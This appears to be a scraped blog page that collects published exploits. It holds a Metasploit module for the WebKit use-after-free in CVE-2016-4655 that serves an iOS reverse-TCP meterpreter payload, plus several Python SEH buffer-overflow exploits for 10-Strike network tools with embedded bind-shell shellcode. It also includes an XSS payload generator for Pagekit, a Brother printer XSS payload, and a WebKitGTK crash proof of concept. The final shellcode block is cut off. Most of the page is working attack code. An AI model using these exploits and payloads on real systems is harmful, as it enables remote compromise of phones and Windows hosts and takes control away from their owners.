##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'WebKit not_number defineProperties UAF',
'Description' => %q{
This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.
},
'License' => MSF_LICENSE,
'Author' => [
'qwertyoruiop', # jbme.qwertyoruiop.com
'siguza', # PhoenixNonce
'tihmstar', # PhoenixNonce
'timwr', # metasploit integration
],
'References' => [
['CVE', '2016-4655'],
['CVE', '2016-4656'],
['CVE', '2016-4657'],
['BID', '92651'],
['BID', '92652'],
['BID', '92653'],
['URL', 'https://blog.lookout.com/trident-pegasus'],
['URL', 'https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/'],
['URL', 'https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf'],
['URL', 'https://github.com/Siguza/PhoenixNonce'],
['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'],
['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'],
],
'Arch' => ARCH_AARCH64,
'Platform' => 'apple_ios',
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },
'Targets' => [[ 'Automatic', {} ]],
'DisclosureDate' => 'Aug 25 2016'))
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),
OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
])
end
def on_request_uri(cli, request)
print_status("Request from #{request['User-Agent']}")
if request.uri =~ %r{/loader$}
print_good("Target is vulnerable.")
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" )
loader_data = File.read(local_file, {:mode => 'rb'})
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
return
elsif request.uri =~ %r{/exploit$}
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" )
loader_data = File.read(local_file, {:mode => 'rb'})
payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
payload_url_index = loader_data.index('PAYLOAD_URL')
loader_data[payload_url_index, payload_url.length] = payload_url
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
print_status("Sent exploit (#{loader_data.size} bytes)")
return
end
html = %Q^
<html>
<body>
<script>
function load_binary_resource(url) {
var req = new XMLHttpRequest();
req.open('GET', url, false);
req.overrideMimeType('text/plain; charset=x-user-defined');
req.send(null);
return req.responseText;
}
var mem0 = 0;
var mem1 = 0;
var mem2 = 0;
function read4(addr) {
mem0[4] = addr;
var ret = mem2[0];
mem0[4] = mem1;
return ret;
}
function write4(addr, val) {
mem0[4] = addr;
mem2[0] = val;
mem0[4] = mem1;
}
filestream = load_binary_resource("exploit")
var shll = new Uint32Array(filestream.length / 4);
for (var i = 0; i < filestream.length;) {
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
shll[i / 4] = word;
i += 4;
}
_dview = null;
function u2d(low, hi) {
if (!_dview) _dview = new DataView(new ArrayBuffer(16));
_dview.setUint32(0, hi);
_dview.setUint32(4, low);
return _dview.getFloat64(0);
}
var pressure = new Array(100);
var bufs = new Array(10000);
dgc = function() {
for (var i = 0; i < pressure.length; i++) {
pressure[i] = new Uint32Array(0x10000);
}
for (var i = 0; i < pressure.length; i++) {
pressure[i] = 0;
}
}
function swag() {
if (bufs[0]) return;
for (var i = 0; i < 4; i++) {
dgc();
}
for (i = 0; i < bufs.length; i++) {
bufs[i] = new Uint32Array(0x100 * 2)
for (k = 0; k < bufs[i].length;) {
bufs[i][k++] = 0x41414141;
bufs[i][k++] = 0xffff0000;
}
}
}
var trycatch = "";
for (var z = 0; z < 0x2000; z++) trycatch += "try{} catch(e){}; ";
var fc = new Function(trycatch);
var fcp = 0;
var smsh = new Uint32Array(0x10)
function smashed(stl) {
document.body.innerHTML = "";
var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]);
write4(jitf, 0xd28024d0); //movz x16, 0x126
write4(jitf + 4, 0x58000060); //ldr x0, 0x100007ee4
write4(jitf + 8, 0xd4001001); //svc 80
write4(jitf + 12, 0xd65f03c0); //ret
write4(jitf + 16, jitf + 0x20);
write4(jitf + 20, 1);
fc();
var dyncache = read4(jitf + 0x20);
var dyncachev = read4(jitf + 0x20);
var go = 1;
while (go) {
if (read4(dyncache) == 0xfeedfacf) {
for (i = 0; i < 0x1000 / 4; i++) {
if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever
{
go = 0;
break;
}
}
}
dyncache += 0x1000;
}
dyncache -= 0x1000;
var bss = [];
var bss_size = [];
for (i = 0; i < 0x1000 / 4; i++) {
if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) {
bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000);
bss_size.push(read4(dyncache + i * 4 + (0x28)));
}
}
var shc = jitf;
var filestream = load_binary_resource("loader")
for (var i = 0; i < filestream.length;) {
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
write4(shc, word);
shc += 4;
i += 4;
}
jitf &= ~0x3FFF;
jitf += 0x8000;
write4(shc, jitf);
write4(shc + 4, 1);
// copy macho
for (var i = 0; i < shll.length; i++) {
write4(jitf + i * 4, shll[i]);
}
for (var i = 0; i < bss.length; i++) {
for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {
write4(bss[i] + k * 4, 0);
}
}
fc();
}
function go_() {
if (smsh.length != 0x10) {
smashed();
return;
}
dgc();
var arr = new Array(0x100);
var yolo = new ArrayBuffer(0x1000);
arr[0] = yolo;
arr[1] = 0x13371337;
var not_number = {};
not_number.toString = function() {
arr = null;
props["stale"]["value"] = null;
swag();
return 10;
};
var props = {
p0: {
value: 0
},
p1: {
value: 1
},
p2: {
value: 2
},
p3: {
value: 3
},
p4: {
value: 4
},
p5: {
value: 5
},
p6: {
value: 6
},
p7: {
value: 7
},
p8: {
value: 8
},
length: {
value: not_number
},
stale: {
value: arr
},
after: {
value: 666
}
};
var target = [];
var stale = 0;
Object.defineProperties(target, props);
stale = target.stale;
stale[0] += 0x101;
stale[1] = {}
for (var z = 0; z < 0x1000; z++) fc();
for (i = 0; i < bufs.length; i++) {
for (k = 0; k < bufs[0].length; k++) {
if (bufs[i][k] == 0x41414242) {
stale[0] = fc;
fcp = bufs[i][k];
stale[0] = {
'a': u2d(105, 0),
'b': u2d(0, 0),
'c': smsh,
'd': u2d(0x100, 0)
}
stale[1] = stale[0]
bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh
bck = stale[0][4];
stale[0][4] = 0; // address, low 32 bits
// stale[0][5] = 1; // address, high 32 bits == 0x100000000
stale[0][6] = 0xffffffff;
mem0 = stale[0];
mem1 = bck;
mem2 = smsh;
bufs.push(stale)
if (smsh.length != 0x10) {
smashed(stale[0]);
}
return;
}
}
}
setTimeout(function() {
document.location.reload();
}, 2000);
}
dgc();
setTimeout(go_, 200);
</script>
</body>
</html>
^
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863571771
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title : 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)
# Exploit Author : Hashim Jawad - ihack4falafel
# Vendor Homepage : https://www.10-strike.com/
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Tested on : Windows 7 Enterprise - SP1 (x86)
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
# Steps to reproduce:
# - Under Computers tab click on 'From Text File'
# - Open Evil.txt and boom!
# Notes:
# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
# - Next SEH offset is 211 bytes but for some reason passing the exception to the program will result in shifting
# the stack by 8 bytes, see buffer for reference.
# - Keep in mind the exploit is contingent on path, and as such you need to make sure offsets stay intact based on
# your username, the following is the path used while developing the exploit (default on Windows 7):
# [C:\Users\IEUser\AppData\Roaming\10-strike\Network Inventory\cfg\]
# - Pro edition is effected as well.
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x3a\x5c' -f python -v shellcode
#Payload size: 355 bytes
#!/usr/bin/python
shellcode = ""
shellcode += "\xba\x58\x39\xb1\xae\xd9\xcf\xd9\x74\x24\xf4\x5f"
shellcode += "\x29\xc9\xb1\x53\x83\xef\xfc\x31\x57\x0e\x03\x0f"
shellcode += "\x37\x53\x5b\x53\xaf\x11\xa4\xab\x30\x76\x2c\x4e"
shellcode += "\x01\xb6\x4a\x1b\x32\x06\x18\x49\xbf\xed\x4c\x79"
shellcode += "\x34\x83\x58\x8e\xfd\x2e\xbf\xa1\xfe\x03\x83\xa0"
shellcode += "\x7c\x5e\xd0\x02\xbc\x91\x25\x43\xf9\xcc\xc4\x11"
shellcode += "\x52\x9a\x7b\x85\xd7\xd6\x47\x2e\xab\xf7\xcf\xd3"
shellcode += "\x7c\xf9\xfe\x42\xf6\xa0\x20\x65\xdb\xd8\x68\x7d"
shellcode += "\x38\xe4\x23\xf6\x8a\x92\xb5\xde\xc2\x5b\x19\x1f"
shellcode += "\xeb\xa9\x63\x58\xcc\x51\x16\x90\x2e\xef\x21\x67"
shellcode += "\x4c\x2b\xa7\x73\xf6\xb8\x1f\x5f\x06\x6c\xf9\x14"
shellcode += "\x04\xd9\x8d\x72\x09\xdc\x42\x09\x35\x55\x65\xdd"
shellcode += "\xbf\x2d\x42\xf9\xe4\xf6\xeb\x58\x41\x58\x13\xba"
shellcode += "\x2a\x05\xb1\xb1\xc7\x52\xc8\x98\x8f\x97\xe1\x22"
shellcode += "\x50\xb0\x72\x51\x62\x1f\x29\xfd\xce\xe8\xf7\xfa"
shellcode += "\x31\xc3\x40\x94\xcf\xec\xb0\xbd\x0b\xb8\xe0\xd5"
shellcode += "\xba\xc1\x6a\x25\x42\x14\x06\x2d\xe5\xc7\x35\xd0"
shellcode += "\x55\xb8\xf9\x7a\x3e\xd2\xf5\xa5\x5e\xdd\xdf\xce"
shellcode += "\xf7\x20\xe0\xe1\x5b\xac\x06\x6b\x74\xf8\x91\x03"
shellcode += "\xb6\xdf\x29\xb4\xc9\x35\x02\x52\x81\x5f\x95\x5d"
shellcode += "\x12\x4a\xb1\xc9\x99\x99\x05\xe8\x9d\xb7\x2d\x7d"
shellcode += "\x09\x4d\xbc\xcc\xab\x52\x95\xa6\x48\xc0\x72\x36"
shellcode += "\x06\xf9\x2c\x61\x4f\xcf\x24\xe7\x7d\x76\x9f\x15"
shellcode += "\x7c\xee\xd8\x9d\x5b\xd3\xe7\x1c\x29\x6f\xcc\x0e"
shellcode += "\xf7\x70\x48\x7a\xa7\x26\x06\xd4\x01\x91\xe8\x8e"
shellcode += "\xdb\x4e\xa3\x46\x9d\xbc\x74\x10\xa2\xe8\x02\xfc"
shellcode += "\x13\x45\x53\x03\x9b\x01\x53\x7c\xc1\xb1\x9c\x57"
shellcode += "\x41\xc1\xd6\xf5\xe0\x4a\xbf\x6c\xb1\x16\x40\x5b"
shellcode += "\xf6\x2e\xc3\x69\x87\xd4\xdb\x18\x82\x91\x5b\xf1"
shellcode += "\xfe\x8a\x09\xf5\xad\xab\x1b"
buffer = '\x41' * 207 filler to nSEH offset (211-4)
buffer += '\x9f\x4e\xe9\x61' 0x61E94E9F [sqlite3.dll] | jmp esp
buffer += '\x90\x90\x90\x90' nSEH
buffer += '\x90\x90\x90\x90' SEH
buffer += shellcode bind shell
buffer += '\xcc' * (3000-207-12-len(shellcode)) junk
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
# Title: Pagekit < 1.0.13 - Cross-Site Scripting Code Generator
# Author : DEEPIN2
# Date: 2018-06-05
# Vendor: Pagekit
# Sotware: https://pagekit.com/
# Version: < 1.0.13
# CVE: 2018-11564
# python3 required
def makesvg(name, code):
code = '<exploit:script xmlns:exploit="http://www.w3.org/1999/xhtml">' + code + '</exploit:script>'
f = open(name, 'w+')
f.write(code)
f.close
if __name__ == '__main__':
print('''
______ _______ ____ ___ _ ___ _ _ ____ __ _ _
/ ___\ \ / / ____| |___ \ / _ \/ |( _ ) / / | ___| / /_ | || |
| | \ \ / /| _| _____ __) | | | | |/ _ \ _____| | |___ \| '_ \| || |_
| |___ \ V / | |__|_____/ __/| |_| | | (_) |_____| | |___) | (_) |__ _|
\____| \_/ |_____| |_____|\___/|_|\___/ |_|_|____/ \___/ |_|
[*] Author : DEEPIN2(Junseo Lee)''')
print('[*] enter name without extension, ex) test.svg -> test')
filename = input('Filename : ') + '.svg'
print('[*] If you want to use alert(), type "alert("bla..bla..")"')
scriptcode = input('Script code : ')
try:
makesvg(filename, scriptcode)
print('[+] Successfully make venom file "%s"' %filename)
except Error as e:
print(e)
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)
# Exploit Author: Hashim Jawad - ihack4falafelx
# Date: 2018-06-05
# Vendor Homepage: https://www.10-strike.com/
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Tested on: Windows 7 Enterprise - SP1 (x86)
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
# Steps to reproduce:
# - Under Help, click 'Enter Registration Key'.
# - Paste the contents of Evil.txt and click OK.
# Notes:
# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
# - There is ample space prior to SEH overwrite.
# - Pro edition is effected as well.
# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -f python -v shellcode
# - Payload size: 355 bytes
#!/usr/bin/python
shellcode = ""
shellcode += "\xbf\xad\xa8\x1e\x44\xdd\xc0\xd9\x74\x24\xf4\x5e"
shellcode += "\x2b\xc9\xb1\x53\x83\xc6\x04\x31\x7e\x0e\x03\xd3"
shellcode += "\xa6\xfc\xb1\xd7\x5f\x82\x3a\x27\xa0\xe3\xb3\xc2"
shellcode += "\x91\x23\xa7\x87\x82\x93\xa3\xc5\x2e\x5f\xe1\xfd"
shellcode += "\xa5\x2d\x2e\xf2\x0e\x9b\x08\x3d\x8e\xb0\x69\x5c"
shellcode += "\x0c\xcb\xbd\xbe\x2d\x04\xb0\xbf\x6a\x79\x39\xed"
shellcode += "\x23\xf5\xec\x01\x47\x43\x2d\xaa\x1b\x45\x35\x4f"
shellcode += "\xeb\x64\x14\xde\x67\x3f\xb6\xe1\xa4\x4b\xff\xf9"
shellcode += "\xa9\x76\x49\x72\x19\x0c\x48\x52\x53\xed\xe7\x9b"
shellcode += "\x5b\x1c\xf9\xdc\x5c\xff\x8c\x14\x9f\x82\x96\xe3"
shellcode += "\xdd\x58\x12\xf7\x46\x2a\x84\xd3\x77\xff\x53\x90"
shellcode += "\x74\xb4\x10\xfe\x98\x4b\xf4\x75\xa4\xc0\xfb\x59"
shellcode += "\x2c\x92\xdf\x7d\x74\x40\x41\x24\xd0\x27\x7e\x36"
shellcode += "\xbb\x98\xda\x3d\x56\xcc\x56\x1c\x3f\x21\x5b\x9e"
shellcode += "\xbf\x2d\xec\xed\x8d\xf2\x46\x79\xbe\x7b\x41\x7e"
shellcode += "\xc1\x51\x35\x10\x3c\x5a\x46\x39\xfb\x0e\x16\x51"
shellcode += "\x2a\x2f\xfd\xa1\xd3\xfa\x68\xa9\x72\x55\x8f\x54"
shellcode += "\xc4\x05\x0f\xf6\xad\x4f\x80\x29\xcd\x6f\x4a\x42"
shellcode += "\x66\x92\x75\x7d\x2b\x1b\x93\x17\xc3\x4d\x0b\x8f"
shellcode += "\x21\xaa\x84\x28\x59\x98\xbc\xde\x12\xca\x7b\xe1"
shellcode += "\xa2\xd8\x2b\x75\x29\x0f\xe8\x64\x2e\x1a\x58\xf1"
shellcode += "\xb9\xd0\x09\xb0\x58\xe4\x03\x22\xf8\x77\xc8\xb2"
shellcode += "\x77\x64\x47\xe5\xd0\x5a\x9e\x63\xcd\xc5\x08\x91"
shellcode += "\x0c\x93\x73\x11\xcb\x60\x7d\x98\x9e\xdd\x59\x8a"
shellcode += "\x66\xdd\xe5\xfe\x36\x88\xb3\xa8\xf0\x62\x72\x02"
shellcode += "\xab\xd9\xdc\xc2\x2a\x12\xdf\x94\x32\x7f\xa9\x78"
shellcode += "\x82\xd6\xec\x87\x2b\xbf\xf8\xf0\x51\x5f\x06\x2b"
shellcode += "\xd2\x6f\x4d\x71\x73\xf8\x08\xe0\xc1\x65\xab\xdf"
shellcode += "\x06\x90\x28\xd5\xf6\x67\x30\x9c\xf3\x2c\xf6\x4d"
shellcode += "\x8e\x3d\x93\x71\x3d\x3d\xb6"
buffer = '\x41' * 4188 # filler to nSEH
buffer += '\x75\x06\x74\x06' # nSEH | jump net
buffer += '\x7a\x49\xe8\x61' # SEH | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]
buffer += '\x90' * 8 # nops
buffer += shellcode # bind shell
buffer += '\x41' * (5000-4188-16-len(shellcode)) # junk
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
# Exploit Title: [ XSS at Brother HL series printers]
# Date: [30.05.2018]
# Exploit Author: [Huy Kha]
# Vendor Homepage: [http://support.brother.com]
# Software Link: [ Website ]
# Version: Brother HL series printers.
# Tested on: Mozilla FireFox
# Reflected XSS Payload :
"--!><Svg/OnLoad=(confirm)(1)>"
# Description : Starting searching for printers without having a password.
When you see a yellow bar with ''Configure the password'' you can take over the full printer by putting a password on it.
# PoC :
If you want to execute the XSS you need to be loged into the web interface first.
# Example :
1. Go to the following url: http://127.0.0.1/
2. Login with ''admin'' as password
3. Intercept now the request with Burpsuite
4. The XSS exist in the loginerror.html?url= parameter
4. Demo URL: http://127.0.0.1/etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241
# Request :
GET /etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
# Response :
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 3389
Content-Type: text/html
Content-Language: nl
Connection: close
Server: debut/1.20
Pragma: no-cache
<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html lang="nl" xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl"><head><meta http-equiv="Content-Script-Type" content="text/javascript" /><meta http-equiv="content-style-type" content="text/css" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><script type="text/javascript" src="/common/js/ews.js"></script>
<link rel="stylesheet" type="text/css" href="../common/css/common.css" />
<link rel="stylesheet" type="text/css" href="../common/css/ews.css" /><title>Brother HL-L2340D series</title></head><body><div id="baseFrame"><div id="frameContainer"><div id="headerFrameContainerLeft"><div id="headerFrameContainerRight"><div id="headerFrameInner"><div id="headerFrame"><div id="modelName"><h1>HL-L2340D series</h1><div class="SetBox" id="SetBoxAuthRight"><div id="SetBoxAuthLeft"><form method="post" action="/general/status.html"><div>Log in<input type="password" id="LogBox" name="B1d6" /><input type="hidden" name="loginurl" value="/net/net/service_detail.html?service="--!><Svg/OnLoad=(confirm)(1)>"&pageid=241"/><input id="login" type="submit" value=" " /></div></form></div></div></div><div id="corporateLogo"><img src="/common/images/logo.gif" alt="Brother" /></div></div><div id="solutions"><div><span><a href="http://solutions.brother.com/cgi-bin/solutions.cgi?MDL=prn088&LNG=en&SRC=DEVICE">Brother<br />Solutions Center</a></span></div></div><div id="tabMenu"><ul><li><ul><li class="selected"><p>Algemeen</p></li></ul></li></ul></div></div></div></div><div id="mainFrameContainer"><div id="mainFrameTopLeft"><div id="mainFrameTopRight"><div id="mainFrameTopInner"><div id="subTabMenu"> </div></div></div></div><div id="mainFrameInner"><div id="subMenu"><div><a href="/general/status.html">Status</a></div><div><a href="/general/reflesh.html" class="subPage">Interval voor autom. vernieuwen</a></div><div><a href="/general/information.html?kind=item">Onderhoudsinformatie</a></div><div><a href="/general/lists.html">Lijsten/Rapporten</a></div><div><a href="/general/find.html">Apparaat zoeken</a></div><div><a href="/general/contact.html">Contactpersoon & locatie</a></div><div><a href="/general/sleep.html">Slaapstand</a></div><div><a href="/general/powerdown.html">Automatisch uitschakelen</a></div><div><a href="/general/language.html">Taal</a></div><div><a href="/general/panel.html">Paneel</a></div><div><a href="/general/replacetoner.html">Toner vervangen</a></div></div><div id="rightFrameContainer"><div id="rightFrame"><div id="mainContent"><div id="pageTitle"><h2>Log in</h2></div><div id="pageContents"><div class="contentsGroup"><p class="noteMessage">Om deze pagina te openen moet u inloggen. Log in s.v.p.</p></div></div></div></div></div><script type="text/javascript"><!--
SetMinHeight();
// --></script></div><div id="mainFrameBottomLeft"><div id="mainFrameBottomRight"><div id="mainFrameBottomInner"></div></div></div></div><div id="footerFrameContainer"><div id="copyright">Copyright(C) 2000-2014 Brother Industries, Ltd. All Rights Reserved.</div><div id="topBack"><a href="#">Top<img src="/common/images/ic_pt.gif" alt="Top" /></a></div></div></div></div></body></html>
# How to fix it? : Update the printer to Firmware 1.16 and set a new password.
# Screenshot : https://imgur.com/a/3OVTSZ4
# Note: The vendor has been contacted on 30-5-2018.
# Title: WebKitGTK+ < 2.21.3 - Crash (PoC)
# Author: Dhiraj Mishra
# Date: 2018-06-05
# Software: https://webkitgtk.org/
# CVE: CVE-2018-11646
# Summary:
# webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in
# UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3,
# mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue.
# PoC:
<script>
win = window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
win.document.execCommand('Stop');
win.document.write("Spoofed URL");
win.document.close();
</script>
Backtrace using fedora 27:
#0 WTF::StringImpl::rawHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
#1 WTF::StringImpl::hasHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
#2 WTF::StringImpl::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
#3 WTF::StringHash::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
#9 WTF::HashMap, WTF::HashTraits >::get
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406
#10 webkitFaviconDatabaseSetIconURLForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193
#11 webkitFaviconDatabaseSetIconForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318
#12 webkitWebViewSetIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964
#13 WTF::Function::performCallbackWithReturnValue
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108
#15 WebKit::WebPageProxy::dataCallback
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083
#16 WebKit::WebPageProxy::finishedLoadingIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848
#17 IPC::callMemberFunctionImpl::operator()
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68
#29 WTF::RunLoop::::_FUN(gpointer)
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70
#30 g_main_dispatch
at gmain.c line 3148
#31 g_main_context_dispatch
at gmain.c line 3813
#32 g_main_context_iterate
at gmain.c line 3886
#33 g_main_context_iteration
at gmain.c line 3947x
#34 g_application_run
at gapplication.c line 2401
#35 main
at ../src/ephy-main.c line 432
# Reference's:
# https://bugs.webkit.org/show_bug.cgi?id=186164
# https://bugzilla.gnome.org/show_bug.cgi?id=795740
# Exploit Title: 10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)
# Exploit Author: Hashim Jawad - ihack4falafel
# Date: 2018-06-05
# Vendor Homepage: https://www.10-strike.com/
# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe
# Tested on: Windows XP Professional - SP3 (x86)
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
# Steps to reproduce:
# - Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.
# - Right-click on newly created host and click 'Trace route...'.
# - Repeat the second step and boom.
# Notes:
# - '\x00' get converted to '\x20' by the program eliminating the possibility of using [pop, pop, retn] pointers in base binary.
# - All loaded modules are compiled with /SafeSEH.
# - Right-click on newly created host and click 'System information>General' is effected by the same vulnerability with different
# offsets and buffer size.
# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -v shellcode -f python
# - Payload size: 355 bytes
#!/usr/bin/python
shellcode = ""
shellcode += "\xb8\x2b\x29\xa7\x48\xd9\xe8\xd9\x74\x24\xf4\x5b"
shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\xc0"
shellcode += "\xd5\x45\xbd\xea\xce\x08\x3e\x12\x0f\x6d\xb6\xf7"
shellcode += "\x3e\xad\xac\x7c\x10\x1d\xa6\xd0\x9d\xd6\xea\xc0"
shellcode += "\x16\x9a\x22\xe7\x9f\x11\x15\xc6\x20\x09\x65\x49"
shellcode += "\xa3\x50\xba\xa9\x9a\x9a\xcf\xa8\xdb\xc7\x22\xf8"
shellcode += "\xb4\x8c\x91\xec\xb1\xd9\x29\x87\x8a\xcc\x29\x74"
shellcode += "\x5a\xee\x18\x2b\xd0\xa9\xba\xca\x35\xc2\xf2\xd4"
shellcode += "\x5a\xef\x4d\x6f\xa8\x9b\x4f\xb9\xe0\x64\xe3\x84"
shellcode += "\xcc\x96\xfd\xc1\xeb\x48\x88\x3b\x08\xf4\x8b\xf8"
shellcode += "\x72\x22\x19\x1a\xd4\xa1\xb9\xc6\xe4\x66\x5f\x8d"
shellcode += "\xeb\xc3\x2b\xc9\xef\xd2\xf8\x62\x0b\x5e\xff\xa4"
shellcode += "\x9d\x24\x24\x60\xc5\xff\x45\x31\xa3\xae\x7a\x21"
shellcode += "\x0c\x0e\xdf\x2a\xa1\x5b\x52\x71\xae\xa8\x5f\x89"
shellcode += "\x2e\xa7\xe8\xfa\x1c\x68\x43\x94\x2c\xe1\x4d\x63"
shellcode += "\x52\xd8\x2a\xfb\xad\xe3\x4a\xd2\x69\xb7\x1a\x4c"
shellcode += "\x5b\xb8\xf0\x8c\x64\x6d\x6c\x84\xc3\xde\x93\x69"
shellcode += "\xb3\x8e\x13\xc1\x5c\xc5\x9b\x3e\x7c\xe6\x71\x57"
shellcode += "\x15\x1b\x7a\x46\xba\x92\x9c\x02\x52\xf3\x37\xba"
shellcode += "\x90\x20\x80\x5d\xea\x02\xb8\xc9\xa3\x44\x7f\xf6"
